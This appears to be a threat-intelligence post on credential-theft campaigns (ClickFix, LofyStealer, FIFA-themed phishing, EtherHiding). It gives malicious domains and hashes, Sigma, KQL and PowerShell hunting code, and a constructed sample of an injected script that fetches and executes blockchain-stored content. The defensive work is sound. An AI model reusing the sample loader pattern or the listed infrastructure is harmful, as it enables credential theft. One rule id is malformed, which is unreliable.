Recent OTX pulse data indicates a coordinated surge in credential theft operations exploiting diverse initial access vectors. Threat actors are pivoting from traditional phishing to sophisticated social engineering lures ("ClickFix" and "BackgroundFix"), supply chain compromises (NPM trojans), and event-based fraud (FIFA World Cup 2026).
Notably, the integration of blockchain technology (Binance Smart Chain testnet) for command-and-control (C2) infrastructure via "EtherHiding" represents a significant evolution in resilience against takedowns. The primary objective across these campaigns is financial monetization through the theft of browser credentials, cookies, and cryptocurrency wallet data, facilitated by malware families such as LofyStealer, Vidar, CastleStealer, and SectopRAT.
Threat Actor / Malware Profile
ClickFix & CastleLoader
- Profile: A social engineering campaign masquerading as fake utilities like "BackgroundFix."
- Distribution: Users are tricked into copying malicious clipboard commands to "verify human" status.
- Behavior: The copied command invokes finger.exe, a native Windows utility, to fetch and execute the CastleLoader payload.
- Payloads: CastleLoader acts as a dropper for NetSupport RAT (remote access) and CastleStealer (credential harvesting).
LofyGang (LofyStealer)
- Profile: Targets the gaming community, specifically Minecraft players.
- Distribution: Social engineering lures distributing malicious Node.js packages masquerading as legitimate gaming libraries.
- Behavior: Uses a two-stage process: a bulky Node.js loader that unpacks a lightweight C++ payload directly into memory to evade disk-based detection.
- Payloads: LofyStealer (also known as GrabBot/Slinky) extracts browser data (passwords, cookies, crypto tokens) from eight different browsers.
GHOST STADIUM
- Profile: Chinese-speaking threat actor targeting high-value international events.
- Distribution: Over 4,300 fraudulent domains impersonating FIFA infrastructure, utilizing pixel-perfect clones of official authentication systems.
- Behavior: Massive phishing-as-a-service ecosystem focusing on ticket fraud and credential harvesting.
- Payloads: Victims are often infected with Vidar and Lumma stealers upon interacting with the fraudulent sites.
EtherHiding / ClearFake
- Profile: Technical innovation in C2 resilience using blockchain smart contracts.
- Distribution: Compromised legitimate websites injected with malicious JavaScript.
- Behavior: The JavaScript queries the Binance Smart Chain (BSC) testnet to retrieve payload routing instructions stored in immutable smart contracts.
- Payloads: Delivers SectopRAT and ACRStealer.
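The EtherHiding pattern above (page script reads routing data from a smart contract, then executes what it received) can be hunted for in captured page scripts. The following heuristic scanner is an added example, not code from the original post or from any vendor; the sample scripts are constructed, the RPC host is a placeholder, and the BSC testnet chain id (97 / 0x61) and "prebsc" host fragment are assumed from public BSC documentation.

```python
import re
from typing import List

# Each indicator is a (label, regex) pair. A single hit is not malicious; the
# combination of a contract read plus dynamic execution is what EtherHiding needs.
INDICATORS = [
    ("contract_read", re.compile(r'method["\']?\s*:\s*["\']eth_(call|getStorageAt)["\']|\.eth\.call\(', re.I)),
    # Assumed BSC testnet markers: chain id 97 (0x61) and the "prebsc" RPC host fragment.
    ("bsc_testnet_ref", re.compile(r'chainId\s*[:=]\s*["\']?(0x61|97)\b|prebsc|bsc-testnet', re.I)),
    ("hex_decode", re.compile(r'toUtf8String|hexToAscii|fromCharCode\(\s*parseInt', re.I)),
    ("dynamic_exec", re.compile(r'\beval\(|new\s+Function\(|document\.write\(|\.innerHTML\s*=', re.I)),
]

def scan_script(js: str) -> List[str]:
    """Return the labels of all indicators present in the script text, in table order."""
    return [label for label, rx in INDICATORS if rx.search(js)]

def is_etherhiding_like(js: str) -> bool:
    """Fire only when contract state is read AND the result is executed or rendered."""
    hits = scan_script(js)
    return "contract_read" in hits and "dynamic_exec" in hits

# Constructed sample of an injected script: reads a contract over JSON-RPC and
# writes the decoded result straight into the page. Not a real sample.
INJECTED_SAMPLE = """
const rpc = "https://data-seed-prebsc-1-s1.example/";  // placeholder RPC host
const body = {jsonrpc:"2.0",id:1,method:"eth_call",
  params:[{to:"0x0000000000000000000000000000000000000000",data:"0x"},"latest"]};
fetch(rpc,{method:"POST",body:JSON.stringify(body)}).then(r=>r.json())
  .then(j=>{ const s = ethers.utils.toUtf8String(j.result); document.write(s); });
"""
# Constructed benign Web3 snippet: reads a balance and shows it as text only.
BENIGN_SAMPLE = """
const balance = await provider.getBalance(addr);
document.getElementById("b").innerText = balance.toString();
"""
```

Run it over scripts extracted from proxy logs or a page crawl; the `bsc_testnet_ref` hit is what ties a generic "read-then-execute" finding to this specific campaign.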
IOC Analysis
The provided pulses contain a high volume of actionable indicators:
- Domains: High-volume phishing domains (e.g., fifa.gold, fifa.black, trindastal.com) and C2 domains (e.g., driver-updater.net). SOC teams should immediately block these at the perimeter and DNS layer.
- File Hashes: Multiple SHA256 and MD5 hashes associated with the Node.js loaders, C++ payloads, and reflective loaders. These should be added to EDR blocklists immediately.
- Network Artifacts: Specific URLs and IPs (e.g., 148.178.22.16) and ports (e.g., 688) used for payload retrieval.
- Operationalization:
  - SIEM: Correlate DeviceNetworkEvents connecting to the listed domains/ports.
  - EDR: Scan for the specific file hashes (SHA256: bde21d8..., 293006c...).
  - Threat Intel Platforms: Ingest the pulse lists to automate blocking of future indicators from these adversary clusters.
Detection Engineering
```yaml
title: Suspicious Finger.exe Execution - Potential ClickFix Activity
id: 6a8b1c9d-0e4f-4a2b-8c3d-1e5f6a7b8c9d
description: Detects the execution of finger.exe, often abused in ClickFix campaigns to retrieve payloads. Uses process creation command line logging.
status: experimental
date: 2026/06/02
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/6604b9e8e14e0426680610eb
tags:
  - attack.initial_access
  - attack.execution
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\finger.exe'
  condition: selection
falsepositives:
  - Legitimate administration usage (rare)
level: high
---
title: Potential EtherHiding C2 via BSC Testnet
id: 7b9c2d0e-1f5a-5b3c-9d4e-2f60a8b9c0d1
description: Detects processes connecting to Binance Smart Chain (BSC) Testnet RPC endpoints (ports 8545 or 443) from non-crypto applications.
status: experimental
date: 2026/06/02
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/6657221d6863d43800419333
tags:
  - attack.command_and_control
  - attack.defense_evasion
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    DestinationPort:
      - 8545
      - 443
    Initiated: 'true'
  filter_legit_crypto:
    Image|contains:
      - 'metamask'
      - 'brave'
      - 'chrome'
      - 'edge'
  condition: selection and not filter_legit_crypto
falsepositives:
  - Legitimate Web3 dApp interactions
level: medium
---
title: Node.js Spawning Child Processes - LofyStealer Suspicion
id: 8c0d3e1f-2g6b-0a4d-0e5f-3a71b9c0d1e2
description: Detects Node.js processes spawning cmd.exe, powershell.exe, or other shells, indicative of Node-based loaders like LofyStealer.
status: experimental
date: 2026/06/02
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/6651ceba0e5e0858e9e8614f
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  # The parent must be matched on ParentImage; matching Image for both parent
  # and child on the same event can never be true.
  selection_parent:
    ParentImage|endswith: '\node.exe'
  selection_child:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\pwsh.exe'
  condition: selection_parent and selection_child
falsepositives:
  - Legitimate development scripts
level: medium
```
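Before shipping rules like the three above, it helps to check their semantics against hand-built events, in particular that the node.exe rule keys on the parent image and that the browser filter in the BSC rule actually suppresses browser traffic. The evaluator below is an added example, not code from the original post; the event dictionaries are constructed, with field names borrowed from Sigma's Windows process_creation and network_connection taxonomy.

```python
from typing import Dict, List, Tuple

SHELLS = ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe")
LEGIT_CRYPTO_CLIENTS = ("metamask", "brave", "chrome", "edge")
RPC_PORTS = (8545, 443)

def rule_finger_exec(ev: Dict) -> bool:
    """Rule 1: any finger.exe process creation (ClickFix retrieval stage)."""
    return (ev.get("category") == "process_creation"
            and ev.get("Image", "").lower().endswith("\\finger.exe"))

def rule_node_spawns_shell(ev: Dict) -> bool:
    """Rule 3: node.exe is the PARENT and a shell is the child (LofyStealer loader)."""
    if ev.get("category") != "process_creation":
        return False
    return (ev.get("ParentImage", "").lower().endswith("\\node.exe")
            and ev.get("Image", "").lower().endswith(SHELLS))

def rule_etherhiding_c2(ev: Dict) -> bool:
    """Rule 2: outbound RPC-port connection from a non-browser, non-wallet process."""
    if ev.get("category") != "network_connection" or ev.get("Initiated") != "true":
        return False
    if ev.get("DestinationPort") not in RPC_PORTS:
        return False
    return not any(tag in ev.get("Image", "").lower() for tag in LEGIT_CRYPTO_CLIENTS)

RULES = {
    "Suspicious Finger.exe Execution": rule_finger_exec,
    "Node.js Spawning Child Processes": rule_node_spawns_shell,
    "Potential EtherHiding C2 via BSC Testnet": rule_etherhiding_c2,
}

def evaluate(events: List[Dict]) -> List[Tuple[int, str]]:
    """Return (event index, rule title) for every rule that fires on each event."""
    return [(i, title) for i, ev in enumerate(events)
            for title, fn in RULES.items() if fn(ev)]

# Constructed sample telemetry (not real events); paths are illustrative.
SAMPLE_EVENTS = [
    {"category": "process_creation", "Image": "C:\\Windows\\System32\\finger.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"category": "process_creation", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Program Files\\nodejs\\node.exe"},
    {"category": "network_connection", "Image": "C:\\Users\\u\\AppData\\Local\\Temp\\upd.exe",
     "DestinationPort": 8545, "Initiated": "true"},
    {"category": "network_connection", "Image": "C:\\Program Files\\Google\\Chrome\\chrome.exe",
     "DestinationPort": 443, "Initiated": "true"},
]
```

Port 443 in the BSC rule will match almost every outbound connection from non-browser software, so expect the filter list to grow beyond the four names in the rule before it is usable.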
```kql
// Hunt for ClickFix related Finger.exe execution and Network Connections
DeviceProcessEvents
| where FileName in~ ("finger.exe", "cmd.exe", "powershell.exe")
| where ProcessCommandLine contains "finger" or ProcessCommandLine contains "http://"
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName
| union (DeviceNetworkEvents
    | where RemoteUrl in~ ("trindastal.com", "poronto.com", "fifa.gold", "fifa.black", "driver-updater.net", "giovettiadv.com")
    | project Timestamp, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName)
```
```powershell
# IOC Hunt Script for ClickFix and Ghost Stadium
# Requires Admin Privileges
$MaliciousDomains = @(
    "trindastal.com", "poronto.com", "brionter.com",
    "fifa.gold", "fifa.black", "fifa.tax", "fifaweb.com",
    "driver-updater.net", "live.ong"
)
$MaliciousHashes = @(
    "bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92",
    "ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9",
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881"
)

Write-Host "[+] Checking for Malicious Processes (finger.exe)..."
$Process = Get-Process -Name "finger" -ErrorAction SilentlyContinue
if ($Process) { Write-Host "[!] ALERT: finger.exe process found running! PID: $($Process.Id)" -ForegroundColor Red }

Write-Host "[+] Scanning Hosts file for IoCs..."
$HostsPath = "$env:SystemRoot\System32\drivers\etc\hosts"
if (Test-Path $HostsPath) {
    $HostsContent = Get-Content $HostsPath
    foreach ($Domain in $MaliciousDomains) {
        if ($HostsContent -like "*$Domain*") {
            Write-Host "[!] ALERT: Domain $Domain found in hosts file!" -ForegroundColor Red
        }
    }
}

Write-Host "[+] Checking recent downloads for file hashes..."
$UserFolder = $env:USERPROFILE
$RecentFiles = Get-ChildItem -Path "$UserFolder\Downloads" -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -gt 1kb -and $_.Length -lt 100mb }
foreach ($File in $RecentFiles) {
    $Hash = (Get-FileHash -Path $File.FullName -Algorithm SHA256).Hash.ToLower()
    if ($MaliciousHashes -contains $Hash) {
        Write-Host "[!] ALERT: Malicious file detected at $($File.FullName)" -ForegroundColor Red
    }
}
Write-Host "[-] Hunt Complete."
```
---
# Response Priorities
Immediate (0-12 hours)
- Block IoCs: Implement block rules on firewalls, proxies, and Secure Web Gateways (SWG) for all listed domains (fifa.*, trindastal.com, etc.) and IPs (148.178.22.16).
- Hunt for Execution: Run the PowerShell script across the enterprise to identify hosts with finger.exe processes or malicious file hashes.
- Takedown Compromised Sites: If internal infrastructure is hosting the malicious domains (unlikely based on external IoCs, but good practice), isolate them immediately.
24 Hours
- Credential Reset: Force password resets for users identified as potentially interacting with phishing kits (specifically FIFA-related or crypto-development teams targeted by JINX-0164).
- Session Revocation: Revoke all active session tokens for corporate webmail and VPNs to mitigate the impact of stolen cookies/tokens (primary goal of LofyStealer and Vidar).
1 Week
- Architecture Hardening: Restrict the ability to run finger.exe and other legacy utilities via Application Control policies (AppLocker/WDAC).
- Supply Chain Security: Audit NPM packages and dependencies used by development teams, particularly those working on cryptocurrency projects, to prevent JINX-0164 supply chain injections.
- User Awareness: Launch targeted phishing simulations mimicking "ClickFix" style fake browser updates and "BackgroundFix" tools to train users against clipboard hijacking.